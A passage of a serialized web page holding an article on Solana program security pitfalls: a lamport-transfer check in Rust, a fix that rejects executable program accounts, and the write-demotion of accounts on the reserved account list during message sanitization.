the\n",{"type":25,"tag":216,"props":77868,"children":77869},{"class":6922,"line":7305},[77870],{"type":25,"tag":216,"props":77871,"children":77872},{"style":6927},[77873],{"type":31,"value":77874},"    // account's data.\n",{"type":25,"tag":216,"props":77876,"children":77877},{"class":6922,"line":7557},[77878],{"type":25,"tag":216,"props":77879,"children":77880},{"style":6964},[77881],{"type":31,"value":77782},{"type":25,"tag":38,"props":77883,"children":77884},{},[77885,77887,77894],{"type":31,"value":77886},"Eventually, the executable flag will be removed entirely as proposed in ",{"type":25,"tag":162,"props":77888,"children":77891},{"href":77889,"rel":77890},"https://github.com/solana-foundation/solana-improvement-documents/blob/main/proposals/0162-remove-accounts-executable-flag-checks.md",[166],[77892],{"type":31,"value":77893},"SIMD-0162",{"type":31,"value":77895},". The reasoning is simple: an account's owner and its content are sufficient to determine if it's a valid program — the executable flag is redundant.",{"type":25,"tag":38,"props":77897,"children":77898},{},[77899,77901,77906,77908,77913],{"type":31,"value":77900},"This change is also a ",{"type":25,"tag":9273,"props":77902,"children":77903},{},[77904],{"type":31,"value":77905},"hard requirement for supporting the new loader-v4",{"type":31,"value":77907},". Unlike the upgradable loader, which relies on a separate ",{"type":25,"tag":82,"props":77909,"children":77911},{"className":77910},[],[77912],{"type":31,"value":77790},{"type":31,"value":77914}," proxy account, loader-v4 stores all program data directly in the program account itself.",{"type":25,"tag":38,"props":77916,"children":77917},{},[77918,77920,77927,77929,77934],{"type":31,"value":77919},"As a result, it becomes impossible to modify the account's size after deployment, or to ",{"type":25,"tag":162,"props":77921,"children":77924},{"href":77922,"rel":77923},"https://github.com/anza-xyz/agave/blob/7a1e57469a5b1aeed617457c0519803620ba953f/programs/bpf_loader/src/lib.rs#L1411",[166],[77925],{"type":31,"value":77926},"migrate",{"type":31,"value":77928}," from the upgradable loader to loader-v4 — without hitting the ",{"type":25,"tag":82,"props":77930,"children":77932},{"className":77931},[],[77933],{"type":31,"value":77367},{"type":31,"value":77935}," restriction.",{"type":25,"tag":630,"props":77937,"children":77939},{"id":77938},"fix-2-reject-program-accounts",[77940],{"type":31,"value":77941},"Fix 2: Reject Program Accounts",{"type":25,"tag":38,"props":77943,"children":77944},{},[77945],{"type":31,"value":77946},"To avoid this footgun, let’s explicitly skip any executable account:",{"type":25,"tag":206,"props":77948,"children":77950},{"className":6915,"code":77949,"language":6914,"meta":7,"style":7},"pub fn can_transfer_lamports(account: &AccountInfo, lamports: u64) -> Result\u003Cbool> {\nfn is_program(account: &AccountInfo) -> bool {\n    account.executable\n}\nlet rent = Rent::get()?;\nlet balance_after = account.lamports() + lamports;\nOk(account.is_writable\n    && rent.is_exempt(balance_after, account.data_len())\n    && !is_program(account))\n}\n",[77951],{"type":25,"tag":82,"props":77952,"children":77953},{"__ignoreMap":7},[77954,78030,78078,78094,78101,78140,78184,78208,78257,78285],{"type":25,"tag":216,"props":77955,"children":77956},{"class":6922,"line":6923},[77957,77961,77965,77970,77974,77978,77982,77986,77990,77994,77998,78002,78006,78010,78014,78018,78022,78026],{"type":25,"tag":216,"props":77958,"children":77959},{"style":6936},[77960],{"type":31,"value":17647},{"type":25,"tag":216,"props":77962,"children":77963},{"style":6936},[77964],{"type":31,"value":17652},{"type":25,"tag":216,"props":77966,"children":77967},{"style":7047},[77968],{"type":31,"value":77969}," can_transfer_lamports",{"type":25,"tag":216,"props":77971,"children":77972},{"style":6964},[77973],{"type":31,"value":1850},{"type":25,"tag":216,"props":77975,"children":77976},{"style":6947},[77977],{"type":31,"value":16909},{"type":25,"tag":216,"props":77979,"children":77980},{"style":6953},[77981],{"type":31,"value":1472},{"type":25,"tag":216,"props":77983,"children":77984},{"style":6953},[77985],{"type":31,"value":11093},{"type":25,"tag":216,"props":77987,"children":77988},{"style":7375},[77989],{"type":31,"value":18896},{"type":25,"tag":216,"props":77991,"children":77992},{"style":6964},[77993],{"type":31,"value":7026},{"type":25,"tag":216,"props":77995,"children":77996},{"style":6947},[77997],{"type":31,"value":19469},{"type":25,"tag":216,"props":77999,"children":78000},{"style":6953},[78001],{"type":31,"value":1472},{"type":25,"tag":216,"props":78003,"children":78004},{"style":7375},[78005],{"type":31,"value":9811},{"type":25,"tag":216,"props":78007,"children":78008},{"style":6964},[78009],{"type":31,"value":7036},{"type":25,"tag":216,"props":78011,"children":78012},{"style":6953},[78013],{"type":31,"value":17714},{"type":25,"tag":216,"props":78015,"children":78016},{"style":7375},[78017],{"type":31,"value":17719},{"type":25,"tag":216,"props":78019,"children":78020},{"style":6964},[78021],{"type":31,"value":9757},{"type":25,"tag":216,"props":78023,"children":78024},{"style":7375},[78025],{"type":31,"value":33646},{"type":25,"tag":216,"props":78027,"children":78028},{"style":6964},[78029],{"type":31,"value":11233},{"type":25,"tag":216,"props":78031,"children":78032},{"class":6922,"line":6769},[78033,78037,78042,78046,78050,78054,78058,78062,78066,78070,78074],{"type":25,"tag":216,"props":78034,"children":78035},{"style":6936},[78036],{"type":31,"value":24226},{"type":25,"tag":216,"props":78038,"children":78039},{"style":7047},[78040],{"type":31,"value":78041}," is_program",{"type":25,"tag":216,"props":78043,"children":78044},{"style":6964},[78045],{"type":31,"value":1850},{"type":25,"tag":216,"props":78047,"children":78048},{"style":6947},[78049],{"type":31,"value":16909},{"type":25,"tag":216,"props":78051,"children":78052},{"style":6953},[78053],{"type":31,"value":1472},{"type":25,"tag":216,"props":78055,"children":78056},{"style":6953},[78057],{"type":31,"value":11093},{"type":25,"tag":216,"props":78059,"children":78060},{"style":7375},[78061],{"type":31,"value":18896},{"type":25,"tag":216,"props":78063,"children":78064},{"style":6964},[78065],{"type":31,"value":7036},{"type":25,"tag":216,"props":78067,"children":78068},{"style":6953},[78069],{"type":31,"value":17714},{"type":25,"tag":216,"props":78071,"children":78072},{"style":7375},[78073],{"type":31,"value":16006},{"type":25,"tag":216,"props":78075,"children":78076},{"style":6964},[78077],{"type":31,"value":7241},{"type":25,"tag":216,"props":78079,"children":78080},{"class":6922,"line":6778},[78081,78085,78089],{"type":25,"tag":216,"props":78082,"children":78083},{"style":6947},[78084],{"type":31,"value":29129},{"type":25,"tag":216,"props":78086,"children":78087},{"style":6953},[78088],{"type":31,"value":179},{"type":25,"tag":216,"props":78090,"children":78091},{"style":6964},[78092],{"type":31,"value":78093},"executable\n",{"type":25,"tag":216,"props":78095,"children":78096},{"class":6922,"line":7005},[78097],{"type":25,"tag":216,"props":78098,"children":78099},{"style":6964},[78100],{"type":31,"value":7874},{"type":25,"tag":216,"props":78102,"children":78103},{"class":6922,"line":7110},[78104,78108,78112,78116,78120,78124,78128,78132,78136],{"type":25,"tag":216,"props":78105,"children":78106},{"style":6936},[78107],{"type":31,"value":15743},{"type":25,"tag":216,"props":78109,"children":78110},{"style":6947},[78111],{"type":31,"value":76861},{"type":25,"tag":216,"props":78113,"children":78114},{"style":6953},[78115],{"type":31,"value":6956},{"type":25,"tag":216,"props":78117,"children":78118},{"style":7375},[78119],{"type":31,"value":47437},{"type":25,"tag":216,"props":78121,"children":78122},{"style":6953},[78123],{"type":31,"value":7438},{"type":25,"tag":216,"props":78125,"children":78126},{"style":7047},[78127],{"type":31,"value":20310},{"type":25,"tag":216,"props":78129,"children":78130},{"style":6964},[78131],{"type":31,"value":17836},{"type":25,"tag":216,"props":78133,"children":78134},{"style":6953},[78135],{"type":31,"value":604},{"type":25,"tag":216,"props":78137,"children":78138},{"style":6964},[78139],{"type":31,"value":6967},{"type":25,"tag":216,"props":78141,"children":78142},{"class":6922,"line":7216},[78143,78147,78152,78156,78160,78164,78168,78172,78176,78180],{"type":25,"tag":216,"props":78144,"children":78145},{"style":6936},[78146],{"type":31,"value":15743},{"type":25,"tag":216,"props":78148,"children":78149},{"style":6947},[78150],{"type":31,"value":78151}," balance_after",{"type":25,"tag":216,"props":78153,"children":78154},{"style":6953},[78155],{"type":31,"value":6956},{"type":25,"tag":216,"props":78157,"children":78158},{"style":6947},[78159],{"type":31,"value":9433},{"type":25,"tag":216,"props":78161,"children":78162},{"style":6953},[78163],{"type":31,"value":179},{"type":25,"tag":216,"props":78165,"children":78166},{"style":7047},[78167],{"type":31,"value":19469},{"type":25,"tag":216,"props":78169,"children":78170},{"style":6964},[78171],{"type":31,"value":18000},{"type":25,"tag":216,"props":78173,"children":78174},{"style":6953},[78175],{"type":31,"value":3539},{"type":25,"tag":216,"props":78177,"children":78178},{"style":6947},[78179],{"type":31,"value":77172},{"type":25,"tag":216,"props":78181,"children":78182},{"style":6964},[78183],{"type":31,"value":6967},{"type":25,"tag":216,"props":78185,"children":78186},{"class":6922,"line":7244},[78187,78191,78195,78199,78203],{"type":25,"tag":216,"props":78188,"children":78189},{"style":7375},[78190],{"type":31,"value":24449},{"type":25,"tag":216,"props":78192,"children":78193},{"style":6964},[78194],{"type":31,"value":1850},{"type":25,"tag":216,"props":78196,"children":78197},{"style":6947},[78198],{"type":31,"value":16909},{"type":25,"tag":216,"props":78200,"children":78201},{"style":6953},[78202],{"type":31,"value":179},{"type":25,"tag":216,"props":78204,"children":78205},{"style":6964},[78206],{"type":31,"value":78207},"is_writable\n",{"type":25,"tag":216,"props":78209,"children":78210},{"class":6922,"line":7257},[78211,78215,78219,78223,78228,78232,78237,78241,78245,78249,78253],{"type":25,"tag":216,"props":78212,"children":78213},{"style":6953},[78214],{"type":31,"value":19579},{"type":25,"tag":216,"props":78216,"children":78217},{"style":6947},[78218],{"type":31,"value":76861},{"type":25,"tag":216,"props":78220,"children":78221},{"style":6953},[78222],{"type":31,"value":179},{"type":25,"tag":216,"props":78224,"children":78225},{"style":7047},[78226],{"type":31,"value":78227},"is_exempt",{"type":25,"tag":216,"props":78229,"children":78230},{"style":6964},[78231],{"type":31,"value":1850},{"type":25,"tag":216,"props":78233,"children":78234},{"style":6947},[78235],{"type":31,"value":78236},"balance_after",{"type":25,"tag":216,"props":78238,"children":78239},{"style":6964},[78240],{"type":31,"value":7026},{"type":25,"tag":216,"props":78242,"children":78243},{"style":6947},[78244],{"type":31,"value":16909},{"type":25,"tag":216,"props":78246,"children":78247},{"style":6953},[78248],{"type":31,"value":179},{"type":25,"tag":216,"props":78250,"children":78251},{"style":7047},[78252],{"type":31,"value":17763},{"type":25,"tag":216,"props":78254,"children":78255},{"style":6964},[78256],{"type":31,"value":19618},{"type":25,"tag":216,"props":78258,"children":78259},{"class":6922,"line":7275},[78260,78264,78268,78273,78277,78281],{"type":25,"tag":216,"props":78261,"children":78262},{"style":6953},[78263],{"type":31,"value":19579},{"type":25,"tag":216,"props":78265,"children":78266},{"style":6953},[78267],{"type":31,"value":16820},{"type":25,"tag":216,"props":78269,"children":78270},{"style":7047},[78271],{"type":31,"value":78272},"is_program",{"type":25,"tag":216,"props":78274,"children":78275},{"style":6964},[78276],{"type":31,"value":1850},{"type":25,"tag":216,"props":78278,"children":78279},{"style":6947},[78280],{"type":31,"value":16909},{"type":25,"tag":216,"props":78282,"children":78283},{"style":6964},[78284],{"type":31,"value":23672},{"type":25,"tag":216,"props":78286,"children":78287},{"class":6922,"line":7296},[78288],{"type":25,"tag":216,"props":78289,"children":78290},{"style":6964},[78291],{"type":31,"value":7874},{"type":25,"tag":38,"props":78293,"children":78294},{},[78295],{"type":31,"value":78296},"Now we’re safe...right?",{"type":25,"tag":606,"props":78298,"children":78300},{"id":78299},"bug-3-the-write-demotion-trap",[78301],{"type":31,"value":78302},"Bug 3: The Write-Demotion Trap",{"type":25,"tag":38,"props":78304,"children":78305},{},[78306,78308,78313,78315,78320],{"type":31,"value":78307},"On Solana, accounts passed as ",{"type":25,"tag":9273,"props":78309,"children":78310},{},[78311],{"type":31,"value":78312},"writable",{"type":31,"value":78314}," in a transaction can be ",{"type":25,"tag":9273,"props":78316,"children":78317},{},[78318],{"type":31,"value":78319},"silently downgraded to read-only",{"type":31,"value":78321},". This behavior occurs during message sanitization — even before your program runs.",{"type":25,"tag":38,"props":78323,"children":78324},{},[78325,78327,78334],{"type":31,"value":78326},"Let’s walk through the logic for legacy messages (note: the same rules apply to ",{"type":25,"tag":162,"props":78328,"children":78331},{"href":78329,"rel":78330},"https://github.com/anza-xyz/solana-sdk/blob/master/message/src/versions/v0/loaded.rs#L58-L98",[166],[78332],{"type":31,"value":78333},"MessageV0",{"type":31,"value":78335},", but legacy is simpler to follow):",{"type":25,"tag":206,"props":78337,"children":78339},{"className":6915,"code":78338,"language":6914,"meta":7,"style":7},"// https://github.com/anza-xyz/solana-sdk/blob/master/message/src/sanitized.rs#L39-L55\nimpl LegacyMessage\u003C'_> {\n    pub fn new(message: legacy::Message, reserved_account_keys: &HashSet\u003CPubkey>) -> Self {\n        let is_writable_account_cache = message\n            .account_keys\n            .iter()\n            .enumerate()\n            .map(|(i, _key)| {\n                message.is_writable_index(i)\n                    && !reserved_account_keys.contains(&message.account_keys[i])\n                    && !message.demote_program_id(i)\n            })\n            .collect::\u003CVec\u003C_>>();\n        Self {\n            message: Cow::Owned(message),\n            is_writable_account_cache,\n        }\n    }\n}\n\n// https://github.com/anza-xyz/solana-sdk/blob/master/message/src/legacy.rs#L642-L644\npub fn demote_program_id(&self, i: usize) -> bool {\n    self.is_key_called_as_program(i) && !self.is_upgradeable_loader_present()\n}\n\n",[78340],{"type":25,"tag":82,"props":78341,"children":78342},{"__ignoreMap":7},[78343,78351,78375,78463,78484,78496,78512,78528,78576,78605,78659,78695,78703,78740,78752,78790,78802,78809,78816,78823,78830,78838,78898,78951],{"type":25,"tag":216,"props":78344,"children":78345},{"class":6922,"line":6923},[78346],{"type":25,"tag":216,"props":78347,"children":78348},{"style":6927},[78349],{"type":31,"value":78350},"// https://github.com/anza-xyz/solana-sdk/blob/master/message/src/sanitized.rs#L39-L55\n",{"type":25,"tag":216,"props":78352,"children":78353},{"class":6922,"line":6769},[78354,78358,78363,78367,78371],{"type":25,"tag":216,"props":78355,"children":78356},{"style":6936},[78357],{"type":31,"value":32153},{"type":25,"tag":216,"props":78359,"children":78360},{"style":7375},[78361],{"type":31,"value":78362}," LegacyMessage",{"type":25,"tag":216,"props":78364,"children":78365},{"style":6964},[78366],{"type":31,"value":26868},{"type":25,"tag":216,"props":78368,"children":78369},{"style":7375},[78370],{"type":31,"value":7031},{"type":25,"tag":216,"props":78372,"children":78373},{"style":6964},[78374],{"type":31,"value":11233},{"type":25,"tag":216,"props":78376,"children":78377},{"class":6922,"line":6778},[78378,78382,78386,78390,78394,78398,78402,78407,78411,78416,78420,78425,78429,78433,78438,78442,78446,78450,78454,78459],{"type":25,"tag":216,"props":78379,"children":78380},{"style":6936},[78381],{"type":31,"value":24803},{"type":25,"tag":216,"props":78383,"children":78384},{"style":6936},[78385],{"type":31,"value":17652},{"type":25,"tag":216,"props":78387,"children":78388},{"style":7047},[78389],{"type":31,"value":35895},{"type":25,"tag":216,"props":78391,"children":78392},{"style":6964},[78393],{"type":31,"value":1850},{"type":25,"tag":216,"props":78395,"children":78396},{"style":6947},[78397],{"type":31,"value":72006},{"type":25,"tag":216,"props":78399,"children":78400},{"style":6953},[78401],{"type":31,"value":1472},{"type":25,"tag":216,"props":78403,"children":78404},{"style":6964},[78405],{"type":31,"value":78406}," legacy",{"type":25,"tag":216,"props":78408,"children":78409},{"style":6953},[78410],{"type":31,"value":7438},{"type":25,"tag":216,"props":78412,"children":78413},{"style":7375},[78414],{"type":31,"value":78415},"Message",{"type":25,"tag":216,"props":78417,"children":78418},{"style":6964},[78419],{"type":31,"value":7026},{"type":25,"tag":216,"props":78421,"children":78422},{"style":6947},[78423],{"type":31,"value":78424},"reserved_account_keys",{"type":25,"tag":216,"props":78426,"children":78427},{"style":6953},[78428],{"type":31,"value":1472},{"type":25,"tag":216,"props":78430,"children":78431},{"style":6953},[78432],{"type":31,"value":11093},{"type":25,"tag":216,"props":78434,"children":78435},{"style":7375},[78436],{"type":31,"value":78437},"HashSet",{"type":25,"tag":216,"props":78439,"children":78440},{"style":6964},[78441],{"type":31,"value":9757},{"type":25,"tag":216,"props":78443,"children":78444},{"style":7375},[78445],{"type":31,"value":25358},{"type":25,"tag":216,"props":78447,"children":78448},{"style":6964},[78449],{"type":31,"value":24406},{"type":25,"tag":216,"props":78451,"children":78452},{"style":6953},[78453],{"type":31,"value":17714},{"type":25,"tag":216,"props":78455,"children":78456},{"style":6936},[78457],{"type":31,"value":78458}," Self",{"type":25,"tag":216,"props":78460,"children":78461},{"style":6964},[78462],{"type":31,"value":7241},{"type":25,"tag":216,"props":78464,"children":78465},{"class":6922,"line":7005},[78466,78470,78475,78479],{"type":25,"tag":216,"props":78467,"children":78468},{"style":6936},[78469],{"type":31,"value":7011},{"type":25,"tag":216,"props":78471,"children":78472},{"style":6947},[78473],{"type":31,"value":78474}," is_writable_account_cache",{"type":25,"tag":216,"props":78476,"children":78477},{"style":6953},[78478],{"type":31,"value":6956},{"type":25,"tag":216,"props":78480,"children":78481},{"style":6947},[78482],{"type":31,"value":78483}," message\n",{"type":25,"tag":216,"props":78485,"children":78486},{"class":6922,"line":7110},[78487,78491],{"type":25,"tag":216,"props":78488,"children":78489},{"style":6953},[78490],{"type":31,"value":7116},{"type":25,"tag":216,"props":78492,"children":78493},{"style":6964},[78494],{"type":31,"value":78495},"account_keys\n",{"type":25,"tag":216,"props":78497,"children":78498},{"class":6922,"line":7216},[78499,78503,78508],{"type":25,"tag":216,"props":78500,"children":78501},{"style":6953},[78502],{"type":31,"value":7116},{"type":25,"tag":216,"props":78504,"children":78505},{"style":7047},[78506],{"type":31,"value":78507},"iter",{"type":25,"tag":216,"props":78509,"children":78510},{"style":6964},[78511],{"type":31,"value":11687},{"type":25,"tag":216,"props":78513,"children":78514},{"class":6922,"line":7244},[78515,78519,78524],{"type":25,"tag":216,"props":78516,"children":78517},{"style":6953},[78518],{"type":31,"value":7116},{"type":25,"tag":216,"props":78520,"children":78521},{"style":7047},[78522],{"type":31,"value":78523},"enumerate",{"type":25,"tag":216,"props":78525,"children":78526},{"style":6964},[78527],{"type":31,"value":11687},{"type":25,"tag":216,"props":78529,"children":78530},{"class":6922,"line":7257},[78531,78535,78539,78543,78547,78551,78555,78559,78564,78568,78572],{"type":25,"tag":216,"props":78532,"children":78533},{"style":6953},[78534],{"type":31,"value":7116},{"type":25,"tag":216,"props":78536,"children":78537},{"style":7047},[78538],{"type":31,"value":71071},{"type":25,"tag":216,"props":78540,"children":78541},{"style":6964},[78542],{"type":31,"value":1850},{"type":25,"tag":216,"props":78544,"children":78545},{"style":6953},[78546],{"type":31,"value":14373},{"type":25,"tag":216,"props":78548,"children":78549},{"style":6964},[78550],{"type":31,"value":1850},{"type":25,"tag":216,"props":78552,"children":78553},{"style":6947},[78554],{"type":31,"value":2289},{"type":25,"tag":216,"props":78556,"children":78557},{"style":6964},[78558],{"type":31,"value":7026},{"type":25,"tag":216,"props":78560,"children":78561},{"style":6947},[78562],{"type":31,"value":78563},"_key",{"type":25,"tag":216,"props":78565,"children":78566},{"style":6964},[78567],{"type":31,"value":1888},{"type":25,"tag":216,"props":78569,"children":78570},{"style":6953},[78571],{"type":31,"value":14373},{"type":25,"tag":216,"props":78573,"children":78574},{"style":6964},[78575],{"type":31,"value":7241},{"type":25,"tag":216,"props":78577,"children":78578},{"class":6922,"line":7275},[78579,78584,78588,78593,78597,78601],{"type":25,"tag":216,"props":78580,"children":78581},{"style":6947},[78582],{"type":31,"value":78583},"                message",{"type":25,"tag":216,"props":78585,"children":78586},{"style":6953},[78587],{"type":31,"value":179},{"type":25,"tag":216,"props":78589,"children":78590},{"style":7047},[78591],{"type":31,"value":78592},"is_writable_index",{"type":25,"tag":216,"props":78594,"children":78595},{"style":6964},[78596],{"type":31,"value":1850},{"type":25,"tag":216,"props":78598,"children":78599},{"style":6947},[78600],{"type":31,"value":2289},{"type":25,"tag":216,"props":78602,"children":78603},{"style":6964},[78604],{"type":31,"value":7107},{"type":25,"tag":216,"props":78606,"children":78607},{"class":6922,"line":7296},[78608,78613,78617,78621,78625,78630,78634,78638,78642,78646,78651,78655],{"type":25,"tag":216,"props":78609,"children":78610},{"style":6953},[78611],{"type":31,"value":78612},"                    &&",{"type":25,"tag":216,"props":78614,"children":78615},{"style":6953},[78616],{"type":31,"value":16820},{"type":25,"tag":216,"props":78618,"children":78619},{"style":6947},[78620],{"type":31,"value":78424},{"type":25,"tag":216,"props":78622,"children":78623},{"style":6953},[78624],{"type":31,"value":179},{"type":25,"tag":216,"props":78626,"children":78627},{"style":7047},[78628],{"type":31,"value":78629},"contains",{"type":25,"tag":216,"props":78631,"children":78632},{"style":6964},[78633],{"type":31,"value":1850},{"type":25,"tag":216,"props":78635,"children":78636},{"style":6953},[78637],{"type":31,"value":7059},{"type":25,"tag":216,"props":78639,"children":78640},{"style":6947},[78641],{"type":31,"value":72006},{"type":25,"tag":216,"props":78643,"children":78644},{"style":6953},[78645],{"type":31,"value":179},{"type":25,"tag":216,"props":78647,"children":78648},{"style":6964},[78649],{"type":31,"value":78650},"account_keys[",{"type":25,"tag":216,"props":78652,"children":78653},{"style":6947},[78654],{"type":31,"value":2289},{"type":25,"tag":216,"props":78656,"children":78657},{"style":6964},[78658],{"type":31,"value":59409},{"type":25,"tag":216,"props":78660,"children":78661},{"class":6922,"line":7305},[78662,78666,78670,78674,78678,78683,78687,78691],{"type":25,"tag":216,"props":78663,"children":78664},{"style":6953},[78665],{"type":31,"value":78612},{"type":25,"tag":216,"props":78667,"children":78668},{"style":6953},[78669],{"type":31,"value":16820},{"type":25,"tag":216,"props":78671,"children":78672},{"style":6947},[78673],{"type":31,"value":72006},{"type":25,"tag":216,"props":78675,"children":78676},{"style":6953},[78677],{"type":31,"value":179},{"type":25,"tag":216,"props":78679,"children":78680},{"style":7047},[78681],{"type":31,"value":78682},"demote_program_id",{"type":25,"tag":216,"props":78684,"children":78685},{"style":6964},[78686],{"type":31,"value":1850},{"type":25,"tag":216,"props":78688,"children":78689},{"style":6947},[78690],{"type":31,"value":2289},{"type":25,"tag":216,"props":78692,"children":78693},{"style":6964},[78694],{"type":31,"value":7107},{"type":25,"tag":216,"props":78696,"children":78697},{"class":6922,"line":7557},[78698],{"type":25,"tag":216,"props":78699,"children":78700},{"style":6964},[78701],{"type":31,"value":78702},"            })\n",{"type":25,"tag":216,"props":78704,"children":78705},{"class":6922,"line":7574},[78706,78710,78715,78719,78723,78727,78731,78735],{"type":25,"tag":216,"props":78707,"children":78708},{"style":6953},[78709],{"type":31,"value":7116},{"type":25,"tag":216,"props":78711,"children":78712},{"style":7047},[78713],{"type":31,"value":78714},"collect",{"type":25,"tag":216,"props":78716,"children":78717},{"style":6953},[78718],{"type":31,"value":7438},{"type":25,"tag":216,"props":78720,"children":78721},{"style":6964},[78722],{"type":31,"value":9757},{"type":25,"tag":216,"props":78724,"children":78725},{"style":7375},[78726],{"type":31,"value":906},{"type":25,"tag":216,"props":78728,"children":78729},{"style":6964},[78730],{"type":31,"value":9757},{"type":25,"tag":216,"props":78732,"children":78733},{"style":6947},[78734],{"type":31,"value":7031},{"type":25,"tag":216,"props":78736,"children":78737},{"style":6964},[78738],{"type":31,"value":78739},">>();\n",{"type":25,"tag":216,"props":78741,"children":78742},{"class":6922,"line":7591},[78743,78748],{"type":25,"tag":216,"props":78744,"children":78745},{"style":6936},[78746],{"type":31,"value":78747},"        Self",{"type":25,"tag":216,"props":78749,"children":78750},{"style":6964},[78751],{"type":31,"value":7241},{"type":25,"tag":216,"props":78753,"children":78754},{"class":6922,"line":7604},[78755,78760,78764,78769,78773,78778,78782,78786],{"type":25,"tag":216,"props":78756,"children":78757},{"style":6947},[78758],{"type":31,"value":78759},"            message",{"type":25,"tag":216,"props":78761,"children":78762},{"style":6953},[78763],{"type":31,"value":1472},{"type":25,"tag":216,"props":78765,"children":78766},{"style":7375},[78767],{"type":31,"value":78768}," Cow",{"type":25,"tag":216,"props":78770,"children":78771},{"style":6953},[78772],{"type":31,"value":7438},{"type":25,"tag":216,"props":78774,"children":78775},{"style":7047},[78776],{"type":31,"value":78777},"Owned",{"type":25,"tag":216,"props":78779,"children":78780},{"style":6964},[78781],{"type":31,"value":1850},{"type":25,"tag":216,"props":78783,"children":78784},{"style":6947},[78785],{"type":31,"value":72006},{"type":25,"tag":216,"props":78787,"children":78788},{"style":6964},[78789],{"type":31,"value":10688},{"type":25,"tag":216,"props":78791,"children":78792},{"class":6922,"line":7613},[78793,78798],{"type":25,"tag":216,"props":78794,"children":78795},{"style":6947},[78796],{"type":31,"value":78797},"            is_writable_account_cache",{"type":25,"tag":216,"props":78799,"children":78800},{"style":6964},[78801],{"type":31,"value":7465},{"type":25,"tag":216,"props":78803,"children":78804},{"class":6922,"line":7636},[78805],{"type":25,"tag":216,"props":78806,"children":78807},{"style":6964},[78808],{"type":31,"value":7302},{"type":25,"tag":216,"props":78810,"children":78811},{"class":6922,"line":7645},[78812],{"type":25,"tag":216,"props":78813,"children":78814},{"style":6964},[78815],{"type":31,"value":7311},{"type":25,"tag":216,"props":78817,"children":78818},{"class":6922,"line":7654},[78819],{"type":25,"tag":216,"props":78820,"children":78821},{"style":6964},[78822],{"type":31,"value":7874},{"type":25,"tag":216,"props":78824,"children":78825},{"class":6922,"line":7722},[78826],{"type":25,"tag":216,"props":78827,"children":78828},{"emptyLinePlaceholder":16},[78829],{"type":31,"value":7642},{"type":25,"tag":216,"props":78831,"children":78832},{"class":6922,"line":7730},[78833],{"type":25,"tag":216,"props":78834,"children":78835},{"style":6927},[78836],{"type":31,"value":78837},"// https://github.com/anza-xyz/solana-sdk/blob/master/message/src/legacy.rs#L642-L644\n",{"type":25,"tag":216,"props":78839,"children":78840},{"class":6922,"line":7760},[78841,78845,78849,78854,78858,78862,78866,78870,78874,78878,78882,78886,78890,78894],{"type":25,"tag":216,"props":78842,"children":78843},{"style":6936},[78844],{"type":31,"value":17647},{"type":25,"tag":216,"props":78846,"children":78847},{"style":6936},[78848],{"type":31,"value":17652},{"type":25,"tag":216,"props":78850,"children":78851},{"style":7047},[78852],{"type":31,"value":78853}," demote_program_id",{"type":25,"tag":216,"props":78855,"children":78856},{"style":6964},[78857],{"type":31,"value":1850},{"type":25,"tag":216,"props":78859,"children":78860},{"style":6953},[78861],{"type":31,"value":7059},{"type":25,"tag":216,"props":78863,"children":78864},{"style":6936},[78865],{"type":31,"value":17670},{"type":25,"tag":216,"props":78867,"children":78868},{"style":6964},[78869],{"type":31,"value":7026},{"type":25,"tag":216,"props":78871,"children":78872},{"style":6947},[78873],{"type":31,"value":2289},{"type":25,"tag":216,"props":78875,"children":78876},{"style":6953},[78877],{"type":31,"value":1472},{"type":25,"tag":216,"props":78879,"children":78880},{"style":7375},[78881],{"type":31,"value":17688},{"type":25,"tag":216,"props":78883,"children":78884},{"style":6964},[78885],{"type":31,"value":7036},{"type":25,"tag":216,"props":78887,"children":78888},{"style":6953},[78889],{"type":31,"value":17714},{"type":25,"tag":216,"props":78891,"children":78892},{"style":7375},[78893],{"type":31,"value":16006},{"type":25,"tag":216,"props":78895,"children":78896},{"style":6964},[78897],{"type":31,"value":7241},{"type":25,"tag":216,"props":78899,"children":78900},{"class":6922,"line":7768},[78901,78905,78909,78914,78918,78922,78926,78930,78934,78938,78942,78947],{"type":25,"tag":216,"props":78902,"children":78903},{"style":6936},[78904],{"type":31,"value":24746},{"type":25,"tag":216,"props":78906,"children":78907},{"style":6953},[78908],{"type":31,"value":179},{"type":25,"tag":216,"props":78910,"children":78911},{"style":7047},[78912],{"type":31,"value":78913},"is_key_called_as_program",{"type":25,"tag":216,"props":78915,"children":78916},{"style":6964},[78917],{"type":31,"value":1850},{"type":25,"tag":216,"props":78919,"children":78920},{"style":6947},[78921],{"type":31,"value":2289},{"type":25,"tag":216,"props":78923,"children":78924},{"style":6964},[78925],{"type":31,"value":7036},{"type":25,"tag":216,"props":78927,"children":78928},{"style":6953},[78929],{"type":31,"value":77167},{"type":25,"tag":216,"props":78931,"children":78932},{"style":6953},[78933],{"type":31,"value":16820},{"type":25,"tag":216,"props":78935,"children":78936},{"style":6936},[78937],{"type":31,"value":17670},{"type":25,"tag":216,"props":78939,"children":78940},{"style":6953},[78941],{"type":31,"value":179},{"type":25,"tag":216,"props":78943,"children":78944},{"style":7047},[78945],{"type":31,"value":78946},"is_upgradeable_loader_present",{"type":25,"tag":216,"props":78948,"children":78949},{"style":6964},[78950],{"type":31,"value":11687},{"type":25,"tag":216,"props":78952,"children":78953},{"class":6922,"line":7800},[78954],{"type":25,"tag":216,"props":78955,"children":78956},{"style":6964},[78957],{"type":31,"value":7874},{"type":25,"tag":38,"props":78959,"children":78960},{},[78961],{"type":31,"value":78962},"As you can see, there are two main causes of write-demotion:",{"type":25,"tag":6711,"props":78964,"children":78965},{},[78966,78978],{"type":25,"tag":2043,"props":78967,"children":78968},{},[78969,78971],{"type":31,"value":78970},"The account appears in the ",{"type":25,"tag":162,"props":78972,"children":78975},{"href":78973,"rel":78974},"https://github.com/anza-xyz/agave/blob/cd76bf6b8da8ec3739f0df4e087de0e50028b034/reserved-account-keys/src/lib.rs#L142-L182",[166],[78976],{"type":31,"value":78977},"reserved account list",{"type":25,"tag":2043,"props":78979,"children":78980},{},[78981],{"type":31,"value":78982},"The account is invoked as a program without the upgradable loader being present in the transaction.",{"type":25,"tag":38,"props":78984,"children":78985},{},[78986],{"type":31,"value":78987},"The second case is generally covered by the executable check implemented previously.",{"type":25,"tag":38,"props":78989,"children":78990},{},[78991],{"type":31,"value":78992},"The first case, however, is far more dangerous — it can silently break your program logic without any obvious cause. Let’s dig deeper into that.",{"type":25,"tag":630,"props":78994,"children":78996},{"id":78995},"the-reserved-account-list",[78997],{"type":31,"value":78998},"The Reserved Account List",{"type":25,"tag":38,"props":79000,"children":79001},{},[79002,79004,79009],{"type":31,"value":79003},"The Solana runtime 